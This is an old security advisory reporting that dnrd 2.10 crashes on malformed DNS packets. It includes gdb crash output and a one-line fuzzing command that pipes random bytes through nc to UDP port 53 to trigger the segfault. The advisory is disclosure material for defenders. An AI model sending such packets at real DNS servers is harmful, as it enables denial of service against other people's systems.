COMMAND

	dnrd DoS

SYSTEMS AFFECTED

	dnrd 2.10

PROBLEM

	Andrew Griffiths posted :
	

	There  are  various  problems  with  dnrd\'s  dns  request   and   reply
	functions, that cause it to crash.
	

	Exploit:
	

	Using two consoles, I did the following, Terminal one got:
	

	[andrewg@blackhole /data/audit/dnrd-2.10/src]$ gdb dnrd

	GNU gdb 5.0rh-5 Red Hat Linux 7.1

	Copyright 2001 Free Software Foundation, Inc.

	GDB is free software, covered by the GNU General Public License, and you are

	welcome to change it and/or distribute copies of it under certain conditions.

	Type \"show copying\" to see the conditions.

	There is absolutely no warranty for GDB.  Type \"show warranty\" for details.

	This GDB was configured as \"i386-redhat-linux\".

	(gdb) set arg -s 1.2.3.4 -d

	(gdb) run

	Starting program: /data/audit/dnrd-2.10/src/dnrd -d

	[New Thread 1024 (LWP 3249)]

	ERROR: Couldn\'t kill dnrd: No such process

	Debug: cache low/high: 800/1000

	Debug: initialising master DNS database

	Debug: no master configuration: /etc/dnrd/master

	Debug: initialising from /etc/hosts, domain= <none>

	Debug: /etc/hosts: 3 records

	Debug: Received DNS query for \"..\\SÖanx, 6h??ü-ÀC?Ï\"?>\" real ? \"?????£æ??@ÖwéÕËl?p?Û@??\"

	

	Program received signal SIGSEGV, Segmentation fault.

	[Switching to Thread 1024 (LWP 3249)]

	parse_query (y=0xbffff140, msg=0xb4bffff7 <Address 0xb4bffff7 out of bounds>,

	    len=1346377321) at dns.c:298

	298         if (ntohs(((short int *) msg)[2]) == 0) {       /* C is nice. */

	

	Note that the ? are various control charatchers that I  couldn\'t  paste
	in, \'cause they are not printable and kept stuffing up vim.
	

	While one terminal two, I did:
	

	dd if=/dev/urandom bs=64 count=1 | nc -u 127.0.0.1 53 -w 1

	

	At one stage I also had msg=0x2e2e2e2e  <Address  0x2e2e2e2e  out  of
	bounds>. It\'s not just parse_query that  has  this  problem,  but  also
	places like get_objectname()

SOLUTION

	Upgrade ??